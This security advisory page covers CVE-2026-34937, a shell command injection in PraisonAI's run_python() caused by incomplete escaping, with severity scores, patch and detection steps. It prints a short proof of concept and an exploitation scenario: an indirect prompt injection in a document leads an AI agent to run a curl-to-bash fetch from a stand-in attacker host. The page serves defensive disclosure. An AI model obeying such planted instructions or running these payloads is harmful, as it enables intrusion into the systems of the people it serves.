CVE-2026-34937 — HIGH (CVSS 7.8)

CISO Take

Any PraisonAI agent pipeline that passes user or task-supplied content to run_python() is exposed to full OS command execution. Critically, the auto-generated Flask server ships with AUTH_ENABLED=False by default, turning this local-classified CVE into a remotely exploitable condition via indirect prompt injection. Update to praisonaiagents >= 1.5.90 immediately and audit any deployment of the built-in Flask server for unauthenticated exposure.

What is the risk?

Rated CVSS 7.8 (Local), but effective exploitability is higher in AI agent deployments. The $() shell substitution bypass is trivially reproducible and the PoC is public. The default unauthenticated Flask server converts the attack vector from Local to Network-reachable. AI agent pipelines processing external or user-supplied data are especially exposed since indirect prompt injection can deliver the payload without direct system access. Exploitability is HIGH in agentic and multi-turn workflow contexts.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
praisonaiagents	pip	<= 1.5.89	`1.5.90`
11 dependents 86% patched ~0d to patch Full package profile →

Do you use praisonaiagents? You're affected.

Severity & Risk

CVSS 3.1

7.8 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 9% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Local

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

What should I do?

7 steps

PATCH

Upgrade praisonaiagents to >= 1.5.90 immediately.
If patching is blocked, disable or restrict run_python() from accepting externally-sourced input via code review and input validation gates.
Set AUTH_ENABLED=True or add network-level controls (firewall rules, mTLS) to any exposed PraisonAI Flask server.
Run the agent process under a least-privilege service account to contain blast radius.
DETECT

Alert on subprocess spawning from Python agent processes, especially child processes with unexpected network connections or file writes to /tmp.
Audit all PraisonAI deployments for shell=True usage with unsanitized inputs.
Add $() and backtick characters to input sanitization blocklists as a defense-in-depth measure.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Prompt Injection Auth Bypass Agent Framework Plugin AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

6.1.2 - AI risk assessment 8.4 - AI system security

NIST AI RMF

GOVERN-1.7 - Processes for AI risk management MANAGE-2.4 - Residual risks are managed

OWASP LLM Top 10

LLM01 - Prompt Injection LLM05 - Improper Output Handling LLM06 - Excessive Agency

Related AI Incidents (1)

CodeWall's Autonomous Agent Reportedly Obtained Unauthorized Access to McKinsey's Lilli AI Platform Database

Feb 2026 McKinsey & Company, CodeWall medium confidence

CodeWall's autonomous agent exploiting an AI platform to gain unauthorized read/write access to production systems matches the attack class of CVE-2026-34937 — both involve AI agent frameworks with code execution capabilities being leveraged for unauthorized system access (auth_bypass + code_execution). PraisonAI is an agent orchestration framework; the incident demonstrates the real-world impact when agent-layer code execution vulnerabilities are exploited.

AIID #1412

Source: AI Incident Database (AIID)

Frequently Asked Questions

What is CVE-2026-34937?

Any PraisonAI agent pipeline that passes user or task-supplied content to run_python() is exposed to full OS command execution. Critically, the auto-generated Flask server ships with AUTH_ENABLED=False by default, turning this local-classified CVE into a remotely exploitable condition via indirect prompt injection. Update to praisonaiagents >= 1.5.90 immediately and audit any deployment of the built-in Flask server for unauthenticated exposure.

Is CVE-2026-34937 actively exploited?

No confirmed active exploitation of CVE-2026-34937 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34937?

1. PATCH: Upgrade praisonaiagents to >= 1.5.90 immediately. 2. If patching is blocked, disable or restrict run_python() from accepting externally-sourced input via code review and input validation gates. 3. Set AUTH_ENABLED=True or add network-level controls (firewall rules, mTLS) to any exposed PraisonAI Flask server. 4. Run the agent process under a least-privilege service account to contain blast radius. 5. DETECT: Alert on subprocess spawning from Python agent processes, especially child processes with unexpected network connections or file writes to /tmp. 6. Audit all PraisonAI deployments for shell=True usage with unsanitized inputs. 7. Add $() and backtick characters to input sanitization blocklists as a defense-in-depth measure.

What systems are affected by CVE-2026-34937?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, code execution sandboxes, multi-agent orchestration, agentic task planners, model serving with code tools.

What is the CVSS score for CVE-2026-34937?

CVE-2026-34937 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.03%.

Technical Details

NVD Description

### Summary `run_python()` in `praisonai` constructs a shell command string by interpolating user-controlled code into `python3 -c "<code>"` and passing it to `subprocess.run(..., shell=True)`. The escaping logic only handles `\` and `"`, leaving `$()` and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked. ### Details `execute_command.py:290` (source) -> `execute_command.py:297` (hop) -> `execute_command.py:310` (sink) ```python # source -- user-controlled code argument def run_python(code: str, cwd=None, timeout=60): # hop -- incomplete escaping, $ and () not handled escaped_code = code.replace('\\', '\\\\').replace('"', '\\"') command = f'{python_cmd} -c "{escaped_code}"' # sink -- shell=True expands $() before python3 runs return execute_command(command=command, cwd=cwd, timeout=timeout) # execute_command calls subprocess.run(command, shell=True, ...) ``` ### PoC ```python # tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30) # install: pip install -e src/praisonai import sys sys.path.insert(0, 'src/praisonai') from praisonai.code.tools.execute_command import run_python result = run_python(code='$(id > /tmp/injected)') print(result) # verify import subprocess print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout) # expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any agent pipeline or API consumer that passes user or task-supplied content to `run_python()` is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with `AUTH_ENABLED = False` by default when no token is configured.

Exploitation Scenario

An adversary crafts a malicious document or web page that an AI research agent is directed to process. The document contains an indirect prompt injection payload instructing the agent to execute: run_python(code='$(curl http://attacker.com/payload.sh | bash)'). When the agent calls run_python() with this string, the incomplete escaping fails to strip $(), the shell expands the substitution before Python is invoked, and the attacker's payload executes with the agent process's OS privileges. On an unauthenticated Flask deployment, the adversary can also POST directly to the code execution endpoint without any prompt injection, reducing the attack to a simple HTTP request.